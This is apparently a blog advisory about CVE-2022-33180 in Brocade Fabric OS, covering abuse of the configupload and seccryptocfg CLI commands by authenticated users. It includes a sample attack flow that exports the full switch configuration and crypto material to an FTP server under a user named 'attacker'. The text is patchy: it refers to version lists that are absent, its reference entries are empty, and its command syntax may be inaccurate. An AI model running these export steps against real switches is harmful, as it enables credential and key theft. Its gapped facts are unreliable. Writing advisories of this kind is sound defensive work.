Brocade Fabric OS is widely used in enterprise storage environments. But in early 2022, a vulnerability—now known as CVE-2022-33180—was discovered in the command line interface (CLI) of Brocade Fabric OS. This post gives you a simple breakdown of the issue, how it can be exploited, relevant code snippets, and references you can use to learn more.
Brocade Fabric OS v8.2.cbn5
The vulnerability allows a locally authenticated attacker to use built-in commands like seccryptocfg or configupload to export sensitive files, which could lead to leakage of confidential data.
Who is Affected?
Only users who have local CLI access and valid authentication can exploit this bug. That means it's not a remote exploit—a user must already have access.
Affected Brocade Fabric OS devices include multiple Brocade switches and storage area network (SAN) components. If your device is running an older version than the ones above, you’re potentially at risk.
Why Does It Matter?
Brocade Fabric OS devices often manage critical data in enterprise setups, including storage networks. Leakage of configuration files (using the affected commands) could reveal network credentials, settings, or encryption parameters. In the wrong hands, this information might allow broader attacks or further unauthorized access.
1. seccryptocfg
This tool is meant to configure or display security cryptography information but can be misused to export sensitive key materials or configurations.
2. configupload
This is intended to export switch configurations for backup or migration. If misused, an attacker could grab the current config, which may include sensitive admin or network settings.
Transfer the exported files out of the device, either over SCP, FTP, SFTP, or USB.
Important: The vulnerability does not require privilege escalation—just valid CLI credentials.
Let’s look at a (sanitized) example command flow an attacker could use
# Connect to Brocade Fabric OS CLI
ssh admin@switch-ip
# Export the running configuration to an FTP server
configupload -all -ftp
# The CLI will prompt for FTP IP, username, destination path
# Example:
# Host IP or Host Name: 192.168.1.100
# User Name: attacker
# Password: [hidden]
# Remote Directory: /uploads/brocade-configs/
If the attacker has access, they could supply their own server credentials and receive a copy of the config file.
Code Snippet: Export Sensitive Crypto Config with seccryptocfg
# Export security crypto keys/config to external server
seccryptocfg export -all -ftp
# Prompts are the same (FTP/SCP/SFTP supported)
Mitigation
Update to a fixed version: The most straightforward solution is to upgrade Brocade Fabric OS to one of these (or later):
v8.2.cbn5
Restrict Local Access: Make sure only trusted staff have CLI accounts, disable any unused accounts, and monitor login activity.
Log and Monitor Exports: Regularly review system logs for unexpected uses of configupload or seccryptocfg to trace suspicious activity.
Official Brocade Security Advisory:
Broadcom PSIRT - Security Advisory for Brocade Fabric OS
NIST Vulnerability Database (NVD) Entry:
SecurityTracker Entry:
SecurityTracker Alert ID: 230888
Summary
CVE-2022-33180 is a real threat to organizations still using legacy Brocade Fabric OS versions. It requires local access, but it could result in unauthorized export of configuration and cryptographic data—which can be a stepping stone to further compromise.
Best move: upgrade ASAP and keep access tightly controlled!
*If your team uses Brocade devices, share this with your network admins so they can check versions and update policies. Stay secure!*
Timeline
Published on: 10/25/2022 21:15:00 UTC
Last modified on: 03/02/2023 16:06:00 UTC